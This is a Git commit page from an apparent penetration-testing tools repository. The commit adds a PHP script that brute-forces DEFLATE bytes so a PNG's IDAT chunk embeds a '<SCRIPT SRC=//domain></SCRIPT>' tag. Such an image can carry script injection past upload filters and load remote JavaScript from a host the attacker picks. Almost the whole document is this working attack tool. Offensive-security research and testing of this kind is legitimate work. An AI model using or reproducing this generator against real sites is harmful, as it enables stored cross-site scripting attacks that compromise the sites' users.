Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2025-09-04 11:08:39 +02:00
Code Issues Packages Projects Releases Wiki Activity

Added my very simple script named generate_png_backdoor_idat_chunks.php

Browse Source
This commit is contained in:
Mariusz B
2018-10-07 19:52:42 +02:00
parent 8c23453c9f
commit 5e2c945322
2 changed files with 38 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

36
web/generate_png_backdoor_idat_chunks.php Executable file
View File

@ -0,0 +1,36 @@
<?php
$domain = strtoupper($argv[1]);
$filename = $argv[2];
// DEFLATE stream bytes
$prefix = '7ff399281922111510691928276e6e';
$suffix = '576e69b16375535b6f';
$precode = '<SCRIPT SRC=//';
$postcode = '></SCRIPT>';
print "Input string to embed in PNG IDAT chunks:\n";
print '"' . $precode . $domain . $postcode . "\"\n\n\n";
$cnt = 0;
for( $i = 0x111111111111; $i < 0xffffffffffff; $i++, $cnt++) {
$b = implode('', str_split(str_pad(dechex($i), 12, '0', STR_PAD_LEFT), 2));
try {
$defl = gzdeflate(hex2bin($prefix . $b . $suffix ));
if ( $cnt % 100000 == 0) {
printf("[Probe: %06d] %s\r\n", $cnt, $defl);
}
if (strpos(strtoupper($defl), $precode.$domain.$postcode) !== false ) {
$cont = bin2hex($defl);
printf("DEFLATE stream found!\n%s\n%s\n\n", $prefix.$b.$suffix, $defl);
file_put_contents($filename, $cont);
}
} catch( exception $e) {
}
}
print 'Done.'
?>